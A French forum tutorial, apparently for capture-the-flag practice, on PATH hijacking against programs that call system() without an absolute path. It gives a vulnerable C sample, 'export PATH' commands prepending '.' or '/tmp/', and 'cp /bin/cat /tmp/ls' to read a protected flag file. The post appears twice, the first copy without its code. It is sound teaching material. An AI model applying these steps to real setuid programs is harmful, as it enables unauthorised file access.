[Failles App] Faille de la fonction system()
Bonjour à tous ,
Pour me mettre dans le bain de la Sécurité Applicative, J'ai décidé de faire ce tutoriel sur "la failles system()".
Dans une premiere Partie nous allons voir pourquoi la fontcion system() de la libc, est faillible.
0x1 - Pourquoi la fonction system() est vulnerable :
Prenons comme exemple le code suivant :
La fonction system a pour argument "ls" , ce qui , executé listera le dossier courant de tout ces fichiers et dossiers.
1er resultat :
Ici, dans le dossier courant on trouve le fichier executable "code" et la source "code.c".
la fonction system va executer l'argument dans le terminal.
essaons donc de mettre un fichier "ls" dans le dossier courant qui affichera "bonjour !" .
Ensuite , nous allons modifier la Variable d'envoronnement PATH , qui est equivalente a celle de windows ..
Exemple sous windows si on met un executable "hola.exe" dans le dossier "system32" , si on tape directement "hola" dans le terminal windows , alors le programme "hola.exe" s'executera.
Sous Linux c'est pareil tout les dossiers inclus dans PATH sont séparé par des ":".
exemple :
Le miens est long , mais peut importe on va le modifier et inclure le dossier courant à la Variable PATH comme ceci :
/*
"." signifie "DOSSIER COURANT"
*/
ainsi , si on tape "ls" dans le dossier ou se trouve le programme ls , on executera directement le programme "ls" du dossier et non "/bin/ls" .
exemple :
0x2 - Exploitation dans un exemple :
Dans certains challenge on peut trouver le code suivant :
Dans ce challenge on aurai uniquement acces en ecriture au dossier "/tmp/" , nous allons donc ajouter à la variable PATH le dossiser tmp comme ceci :
Voici !
Vous devinerez que cette fois ci, il faudra creer un programme dans le dossier tmp.
ce que j'ai fais , moi , c'est tout simplement executer ce code la :
Merci d'avoir prété intention à mon "Tutoriel" et à bientot !!
Pour me mettre dans le bain de la Sécurité Applicative, J'ai décidé de faire ce tutoriel sur "la failles system()".
Dans une premiere Partie nous allons voir pourquoi la fontcion system() de la libc, est faillible.
0x1 - Pourquoi la fonction system() est vulnerable :
Prenons comme exemple le code suivant :
Code :
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
printf("----- Faille de la fonction Systeme ------\n Listing Directory Function \n");
system("ls");
printf("END\n");
exit(1);
}
La fonction system a pour argument "ls" , ce qui , executé listera le dossier courant de tout ces fichiers et dossiers.
1er resultat :
Citation :[18:19 sakiir@sakiir system] > gcc code.c -o code
[18:19 sakiir@sakiir system] > ./code
----- Faille de la fonction Systeme ------
Listing Directory Function
code code.c
END
[18:20 sakiir@sakiir system] >
Ici, dans le dossier courant on trouve le fichier executable "code" et la source "code.c".
la fonction system va executer l'argument dans le terminal.
essaons donc de mettre un fichier "ls" dans le dossier courant qui affichera "bonjour !" .
Ensuite , nous allons modifier la Variable d'envoronnement PATH , qui est equivalente a celle de windows ..
Exemple sous windows si on met un executable "hola.exe" dans le dossier "system32" , si on tape directement "hola" dans le terminal windows , alors le programme "hola.exe" s'executera.
Sous Linux c'est pareil tout les dossiers inclus dans PATH sont séparé par des ":".
exemple :
Citation :[18:23 sakiir@sakiir system] > echo $PATH
/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:26 sakiir@sakiir system] >
Le miens est long , mais peut importe on va le modifier et inclure le dossier courant à la Variable PATH comme ceci :
Citation :[18:27 sakiir@sakiir system] > export PATH=.:$PATH
[18:27 sakiir@sakiir system] > echo $PATH
.:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:28 sakiir@sakiir system] >
/*
"." signifie "DOSSIER COURANT"
*/
ainsi , si on tape "ls" dans le dossier ou se trouve le programme ls , on executera directement le programme "ls" du dossier et non "/bin/ls" .
exemple :
Citation :[18:30 sakiir@sakiir system] > /bin/ls
code code.c hello.c ls
[18:30 sakiir@sakiir system] > ls
bonjour !
0x2 - Exploitation dans un exemple :
Dans certains challenge on peut trouver le code suivant :
Code :
#include <stdio.h>
int main()
{
system("ls /dossier/dossier/flag");
}
Dans ce challenge on aurai uniquement acces en ecriture au dossier "/tmp/" , nous allons donc ajouter à la variable PATH le dossiser tmp comme ceci :
Citation :[18:36 sakiir@sakiir system] > export PATH=/tmp/:$PATH
[18:36 sakiir@sakiir system] > echo $PATH
/tmp/:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:36 sakiir@sakiir system] >
Voici !
Vous devinerez que cette fois ci, il faudra creer un programme dans le dossier tmp.
ce que j'ai fais , moi , c'est tout simplement executer ce code la :
Citation :cp /bin/cat /tmp/lsDonc ici le programme cat est dans tmp avec le nom "ls".
Merci d'avoir prété intention à mon "Tutoriel" et à bientot !!